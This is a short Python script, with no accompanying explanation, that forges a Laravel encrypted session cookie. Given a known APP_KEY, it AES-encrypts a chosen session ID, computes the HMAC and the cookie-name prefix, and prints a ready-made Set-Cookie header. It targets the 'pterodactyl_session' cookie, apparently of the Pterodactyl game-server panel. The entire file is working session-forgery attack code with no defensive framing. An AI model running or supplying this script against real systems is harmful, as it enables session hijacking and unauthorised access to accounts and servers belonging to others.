import os import json import base64 import hmac import hashlib from Crypto.Cipher import AES def pad(data: bytes, block_size: int = AES.block_size) -> bytes: """ PKCS7 padding: pads `data` up to a multiple of block_size. """ pad_len = block_size - (len(data) % block_size) return data + bytes([pad_len]) * pad_len def forge_laravel_session(session_id: str, key_b64: str) -> str: """ Forge a Laravel-style encrypted session cookie, matching your decrypt logic. """ # 1) Decode APP_KEY key = base64.b64decode(key_b64) if len(key) != 32: raise ValueError("APP_KEY must decode to 32 bytes for AES-256.") # 2) Random IV + raw ciphertext iv = os.urandom(16) cipher = AES.new(key, AES.MODE_CBC, iv) ciphertext = cipher.encrypt(pad(session_id.encode("utf-8"))) # 3) Build the base64 strings exactly as in the payload iv_b64 = base64.b64encode(iv).decode("utf-8") value_b64 = base64.b64encode(ciphertext).decode("utf-8") # 4) MAC = HMAC‑SHA256(key, iv_b64 || value_b64) mac_data = iv_b64.encode("utf-8") + value_b64.encode("utf-8") mac = hmac.new(key, mac_data, hashlib.sha256).hexdigest() # 5) Package & base64‑encode the JSON payload = { "iv": iv_b64, "value": value_b64, "mac": mac } json_payload = json.dumps(payload, separators=(",", ":")) return base64.b64encode(json_payload.encode("utf-8")).decode("utf-8") def prefix_for_laravel_cookie(cookie_name: str, key_b64: str) -> str: key = base64.b64decode(key_b64) # exactly CookieValuePrefix::create sig = hmac.new(key, (cookie_name + 'v2').encode(), hashlib.sha1).hexdigest() return sig if __name__ == "__main__": # ——— CONFIGURE THESE ——— real_session_id = "xxxx" key_b64 = "xxxxxx" # ———————————————— hashed = prefix_for_laravel_cookie("pterodactyl_session", key_b64) print(f"Session ID: {real_session_id}") print(f"Hashed ID: {hashed}") full_payload = f"{hashed}|{real_session_id}" cookie_value = forge_laravel_session(full_payload, key_b64) print("Set-Cookie: laravel_session=" + cookie_value + "; Path=/; HttpOnly; Secure")